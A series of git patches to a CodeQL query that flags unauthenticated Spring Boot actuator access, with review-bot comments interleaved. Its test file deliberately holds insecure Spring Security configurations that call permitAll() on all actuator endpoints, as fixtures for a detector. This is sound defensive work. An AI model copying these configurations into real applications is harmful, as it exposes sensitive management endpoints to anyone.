a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql 
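Review bot: In the first `exists` of `permitsSpringBootActuators`, the `exists(AnyRequestCall anyRequestCall | ...)` alternative is not guarded by `authorizeRequestsCall.getNumArgument() = 0`, because `and` binds tighter than `or`, although the comment above it groups it with the zero-argument `requestMatchers` case. The results are probably unchanged, since `anyRequestCall.getQualifier() = authorizeRequestsCall` already implies a chained call, but the grouping reads as accidental in a security query. Wrapping the two alternatives as `authorizeRequestsCall.getNumArgument() = 0 and ( exists(RegistryRequestMatchersCall ...) or exists(AnyRequestCall ...) )` makes the intent explicit. The last comment in the second `exists` also ends in a dangling `or` that can be dropped; the logic itself is carried over from the removed member predicate.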
+++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql @@ -12,8 +12,9 @@ */ import java +import semmle.code.java.frameworks.spring.SpringSecurity import semmle.code.java.security.SpringBootActuatorsQuery from PermitAllCall permitAllCall -where permitAllCall.permitsSpringBootActuators() +where permitsSpringBootActuators(permitAllCall) select permitAllCall, "Unauthenticated access to Spring Boot actuator is allowed." diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql index f397fdb79aab..87044bb74dbc 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql @@ -1,4 +1,5 @@ import java +import semmle.code.java.frameworks.spring.SpringSecurity import semmle.code.java.security.SpringBootActuatorsQuery import utils.test.InlineExpectationsTest @@ -7,7 +8,7 @@ module SpringBootActuatorsTest implements TestSig { predicate hasActualResult(Location location, string element, string tag, string value) { tag = "hasExposedSpringBootActuator" and - exists(PermitAllCall permitAllCall | permitAllCall.permitsSpringBootActuators() | + exists(PermitAllCall permitAllCall | permitsSpringBootActuators(permitAllCall) | permitAllCall.getLocation() = location and element = permitAllCall.toString() and value = "" From b2469ff8baa1d249efc5b411443027b847b17ad5 Mon Sep 17 00:00:00 2001 
From: Jami Cogswell Date: Thu, 20 Feb 2025 16:58:42 -0500 Subject: [PATCH 017/892] Java: add APIs and tests for more recent Spring versions: authorizeHttpRequests, AuthorizeHttpRequestsConfigurer, securityMatcher(s) --- .../java/frameworks/spring/SpringSecurity.qll | 29 +++- .../security/SpringBootActuatorsQuery.qll | 85 +++++++-- .../CWE-016/SpringBootActuatorsTest.java | 163 ++++++++++++++++++ .../annotation/web/builders/HttpSecurity.java | 28 +++ .../AuthorizeHttpRequestsConfigurer.java | 18 ++ 5 files changed, 306 insertions(+), 17 deletions(-) create mode 100644 java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll index 3f11cc8d3ec8..a8de07ca5bc7 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll @@ -15,12 +15,17 @@ class TypeHttpSecurity extends Class { /** * The class - * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. + * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer$AuthorizedUrl` + * or the class + * `org.springframework.security.config.annotation.web.configurers.AuthorizeHttpRequestsConfigurer$AuthorizedUrl`. */ class TypeAuthorizedUrl extends Class { TypeAuthorizedUrl() { this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", - "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") + [ + "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>", + "AuthorizeHttpRequestsConfigurer$AuthorizedUrl<>" + ]) } } 
@@ -34,7 +39,12 @@ class TypeAbstractRequestMatcherRegistry extends Class { } } -/** A call to `HttpSecurity.authorizeRequests` method. */ +/** + * A call to `HttpSecurity.authorizeRequests` method. + * + * Note: this API is deprecated and scheduled for removal + * in Spring Security 7.0. + */ class AuthorizeRequestsCall extends MethodCall { AuthorizeRequestsCall() { this.getMethod().hasName("authorizeRequests") and @@ -42,6 +52,19 @@ class AuthorizeRequestsCall extends MethodCall { } } +/** + * A call to `HttpSecurity.authorizeHttpRequests` method. + * + * Note: the no-argument version of this API is deprecated + * and scheduled for removal in Spring Security 7.0. + */ +class AuthorizeHttpRequestsCall extends MethodCall { + AuthorizeHttpRequestsCall() { + this.getMethod().hasName("authorizeHttpRequests") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + /** A call to `AuthorizedUrl.permitAll` method. */ class PermitAllCall extends MethodCall { PermitAllCall() { diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index 6ccfa39f3d63..f3635912d5a4 100644 --- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -6,7 +6,7 @@ private import semmle.code.java.frameworks.spring.SpringBoot /** * A call to `HttpSecurity.requestMatcher` method with argument - * `RequestMatcher.toAnyEndpoint()`. + * `EndpointRequest.toAnyEndpoint()`. */ private class RequestMatcherCall extends MethodCall { RequestMatcherCall() { @@ -18,7 +18,7 @@ private class RequestMatcherCall extends MethodCall { /** * A call to `HttpSecurity.requestMatchers` method with lambda argument - * `RequestMatcher.toAnyEndpoint()`. + * `EndpointRequest.toAnyEndpoint()`. */ private class RequestMatchersCall extends MethodCall { RequestMatchersCall() { 
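Review bot: The QLDoc correction from `RequestMatcher.toAnyEndpoint()` to `EndpointRequest.toAnyEndpoint()` is applied in the `@@ -6,7 +6,7 @@` and `@@ -18,7 +18,7 @@` hunks only, so `RegistryRequestMatchersCall`, which sits between them and the next hunk and is not touched, appears to keep the old wording. `toAnyEndpoint` is declared on `EndpointRequest`, so I would replace `RequestMatcher` with `EndpointRequest` in that class's comment as well, so that the three matcher classes agree. The bodies of `RequestMatcherCall` and `RequestMatchersCall` continue outside these hunks.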
@@ -40,18 +40,75 @@ private class RegistryRequestMatchersCall extends MethodCall { } } +/** + * A call to `HttpSecurity.securityMatcher` method with argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class SecurityMatcherCall extends MethodCall { + SecurityMatcherCall() { + this.getMethod().hasName("securityMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0) instanceof ToAnyEndpointCall + } +} + +/** + * A call to `HttpSecurity.securityMatchers` method with lambda argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class SecurityMatchersCall extends MethodCall { + SecurityMatchersCall() { + this.getMethod().hasName("securityMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall + } +} + +/** + * A call to a method that authorizes requests, e.g. `authorizeRequests` or + * `authorizeHttpRequests`. + */ +private class AuthorizeCall extends MethodCall { + AuthorizeCall() { + this instanceof AuthorizeRequestsCall or + this instanceof AuthorizeHttpRequestsCall + } +} + +/** + * A call to a matcher method with argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class MatcherCall extends MethodCall { + MatcherCall() { + this instanceof RequestMatcherCall or + this instanceof SecurityMatcherCall + } +} + +/** + * A call to a matchers method with argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class MatchersCall extends MethodCall { + MatchersCall() { + this instanceof RequestMatchersCall or + this instanceof SecurityMatchersCall + } +} + /** Holds if `permitAllCall` is called on request(s) mapped to actuator endpoint(s). */ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { - exists(AuthorizeRequestsCall authorizeRequestsCall | + exists(AuthorizeCall authorizeCall | // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] 
- authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall + authorizeCall.getQualifier() instanceof MatcherCall or // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall + authorizeCall.getQualifier() instanceof MatchersCall | // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and ( permitAllCall.getQualifier() instanceof AnyRequestCall or permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall 
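Review bot: `SecurityMatchersCall` will miss the usual way the customizer is written, because it only accepts a lambda whose expression body is itself the `EndpointRequest.toAnyEndpoint()` call (`this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall`), the same constraint `RequestMatchersCall` already had. Application code normally writes `matchers -> matchers.requestMatchers(EndpointRequest.toAnyEndpoint())`, whose body is a call on the lambda parameter, so a filter chain scoped that way would presumably go unreported. Consider also accepting `this.getArgument(0).(LambdaExpr).getExprBody() instanceof RegistryRequestMatchersCall` and adding a test for that shape. This assumes the configurer's `requestMatchers` is declared on a type that `RegistryRequestMatchersCall` covers, which the hunk does not show. The later refactoring patch (020) carries the same constraint into `HttpSecurityMatchersCall`.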
@@ -59,30 +116,30 @@ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { or // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or // [...].authorizeRequests().anyRequest().permitAll() - authorizeRequestsCall.getNumArgument() = 0 and + authorizeCall.getNumArgument() = 0 and exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + registryRequestMatchersCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = registryRequestMatchersCall ) or exists(AnyRequestCall anyRequestCall | - anyRequestCall.getQualifier() = authorizeRequestsCall and + anyRequestCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = anyRequestCall ) ) or - exists(AuthorizeRequestsCall authorizeRequestsCall | + exists(AuthorizeCall authorizeCall | // http.authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof VarAccess + authorizeCall.getQualifier() instanceof VarAccess | // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall or // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - authorizeRequestsCall.getNumArgument() = 0 and + authorizeCall.getNumArgument() = 0 and exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + registryRequestMatchersCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = registryRequestMatchersCall ) ) diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index 71856f5c1a92..fbe9d2e6e5cd 100644 
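Review bot: The lambda branches compare `authorizeCall.getArgument(0).(LambdaExpr).getExprBody()` directly with `permitAllCall`, so only an expression-bodied lambda whose outermost call is `permitAll()` is reported. A block-bodied lambda, or a chain that continues after `permitAll()` with further rules, is not matched. The predicate now covers `authorizeHttpRequests`, whose lambda form is the non-deprecated one, so this limit should at least be documented next to the condition, e.g. `// NOTE: only expression-bodied lambdas ending in permitAll() are matched; block bodies and longer chains are not reported`. The inline pattern comments in this hunk still name only `authorizeRequests` and could mention `authorizeHttpRequests` too. `permitsSpringBootActuators` starts before this hunk.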
--- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java @@ -2,6 +2,7 @@ import org.springframework.security.config.annotation.web.builders.HttpSecurity; public class SpringBootActuatorsTest { + // Spring security version 5.2.3 used `authorizeRequests` and `requestMatcher(s)` protected void configure(HttpSecurity http) throws Exception { http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator } 
@@ -101,4 +102,166 @@ protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); } + + // Spring security version 5.5.0 introduced `authorizeHttpRequests` + protected void configure_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> 
EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configureOk3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOk4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(authz -> authz.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints1_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); + } + + protected void configureOkSafeEndpoints7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> 
EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + protected void configureOkNoPermitAll5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); + } + + protected void configureOkNoPermitAll7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + // Spring security version 5.8.0 introduced `securityMatcher(s)` + protected void configure_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure2_securityMatchers(HttpSecurity http) throws 
Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configureOk1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkSafeEndpoints1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + 
+ protected void configureOkSafeEndpoints4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + protected void configureOkNoPermitAll7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java index 3dbe33cdeb9c..f900fc74d2fd 100644 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java 
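Review bot: No case here exercises the `securityMatcher(String... patterns)` overload that this patch adds to the `HttpSecurity` stub, so the tests do not record whether a chain scoped by a path pattern is meant to be reported. The query classes accept only an `EndpointRequest.toAnyEndpoint()` argument, so a chain such as `http.securityMatcher("/actuator/**").authorizeHttpRequests(r -> r.anyRequest().permitAll());` (constructed example) would presumably produce no alert. Adding that case with `// $ MISSING: hasExposedSpringBootActuator`, or with a plain comment saying path patterns are out of scope, would pin the current behaviour and make the gap visible to readers of the test.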
+++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java @@ -9,6 +9,7 @@ import org.springframework.security.config.Customizer; import org.springframework.security.config.annotation.web.configurers.CsrfConfigurer; import org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer; +import org.springframework.security.config.annotation.web.configurers.AuthorizeHttpRequestsConfigurer; import org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry; public final class HttpSecurity extends AbstractConfiguredSecurityBuilder @@ -18,6 +19,14 @@ public HttpSecurity requestMatcher(RequestMatcher requestMatcher) { return this; } + public HttpSecurity securityMatcher(RequestMatcher requestMatcher) { + return this; + } + + public HttpSecurity securityMatcher(String... patterns) { + return this; + } + public HttpSecurity authorizeRequests( Customizer.ExpressionInterceptUrlRegistry> authorizeRequestsCustomizer) throws Exception { @@ -29,6 +38,17 @@ public ExpressionUrlAuthorizationConfigurer.ExpressionInterceptUrl return null; } + public HttpSecurity authorizeHttpRequests( + Customizer.AuthorizationManagerRequestMatcherRegistry> authorizeHttpRequestsCustomizer) + throws Exception { + return this; + } + + public AuthorizeHttpRequestsConfigurer.AuthorizationManagerRequestMatcherRegistry authorizeHttpRequests() + throws Exception { + return null; + } + public HttpSecurity requestMatchers(Customizer requestMatcherCustomizer) { return this; } @@ -37,6 +57,14 @@ public RequestMatcherConfigurer requestMatchers() { return null; } + public HttpSecurity securityMatchers(Customizer requestMatcherCustomizer) { + return this; + } + + public RequestMatcherConfigurer securityMatchers() { + return null; + } + public CsrfConfigurer csrf() { return null; } 
diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java
new file mode 100644
index 000000000000..f27a2aeef5ae
--- /dev/null
+++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java
@@ -0,0 +1,18 @@
+package org.springframework.security.config.annotation.web.configurers;
+
+import org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry;
+import org.springframework.security.config.annotation.web.HttpSecurityBuilder;
+
+public final class AuthorizeHttpRequestsConfigurer>
+ extends AbstractHttpConfigurer, H> {
+
+ public final class AuthorizationManagerRequestMatcherRegistry extends
+ AbstractRequestMatcherRegistry {
+ }
+
+ public class AuthorizedUrl {
+ public AuthorizationManagerRequestMatcherRegistry permitAll() {
+ return null;
+ }
+ }
+}
From 9e51b014d24a5ce2c5931cb7a46888a966e6eb8c Mon Sep 17 00:00:00 2001
From: Jami Cogswell
Date: Sun, 23 Feb 2025 23:28:10 -0500
Subject: [PATCH 018/892] Java: handle example in Spring docs
---
.../code/java/security/SpringBootActuatorsQuery.qll | 9 +++++++++
.../security/CWE-016/SpringBootActuatorsTest.java | 7 +++++++
2 files changed, 16 insertions(+)
diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll
index f3635912d5a4..d58955a4037e 100644
--- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll
+++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll
@@ -142,5 +142,14 @@ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { registryRequestMatchersCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = registryRequestMatchersCall ) + or + exists(Variable v, MatcherCall matcherCall | + // http.securityMatcher(EndpointRequest.toAnyEndpoint()); + // http.authorizeRequests([...].permitAll()) + v.getAnAccess() = authorizeCall.getQualifier() and + v.getAnAccess() = matcherCall.getQualifier() and + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + permitAllCall.getQualifier() instanceof AnyRequestCall + ) ) } diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index fbe9d2e6e5cd..516c53e4b206 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java @@ -264,4 +264,11 @@ protected void configureOkNoPermitAll4_securityMatchers(HttpSecurity http) throw protected void configureOkNoPermitAll7_securityMatchers(HttpSecurity http) throws Exception { http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); } + + // Spring doc example + // https://docs.spring.io/spring-boot/reference/actuator/endpoints.html#actuator.endpoints.security + public void securityFilterChain(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } } From f65a5b9a6625c43c9cc4ce8fd9e1982455627325 Mon Sep 17 00:00:00 2001 
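Review bot: The new disjunct links the matcher call and the authorize call only through `v.getAnAccess()`, with no check that both calls sit in the same callable. If `v` is a field, the two accesses may come from unrelated methods and yield a spurious alert. Adding `matcherCall.getEnclosingCallable() = authorizeCall.getEnclosingCallable()` would restrict it to the split-statement shape the comment describes. The disjunct also accepts only `MatcherCall` with a lambda ending in `anyRequest().permitAll()`, so the split form using `securityMatchers(...)` or the no-argument `authorizeHttpRequests().anyRequest().permitAll()` chain is presumably still unreported. `permitsSpringBootActuators` begins outside this hunk.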
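Review bot: Only the reporting case of the split-statement form is tested; no companion case shows that the new disjunct stays quiet when it should. Add one where the first statement is `http.securityMatcher(EndpointRequest.to("health", "info"));` followed by the same `authorizeHttpRequests` call. Add another where the lambda is `requests -> requests.anyRequest()` without `permitAll()`. Neither should carry an alert marker.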
From: Jami Cogswell Date: Sun, 23 Feb 2025 23:37:05 -0500 Subject: [PATCH 019/892] Java: add test for qhelp good example --- .../security/CWE-016/SpringBootActuatorsTest.java | 7 +++++++ .../web/configurers/AuthorizeHttpRequestsConfigurer.java | 4 ++++ .../configurers/ExpressionUrlAuthorizationConfigurer.java | 4 ++++ 3 files changed, 15 insertions(+) diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index 516c53e4b206..2f54cd442b50 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java @@ -271,4 +271,11 @@ public void securityFilterChain(HttpSecurity http) throws Exception { http.securityMatcher(EndpointRequest.toAnyEndpoint()); http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator } + + // QHelp Good example + protected void configureQhelpGood(HttpSecurity http) throws Exception { + // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> + requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + } } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java index f27a2aeef5ae..ff54fc7e3d11 100644 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java +++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java 
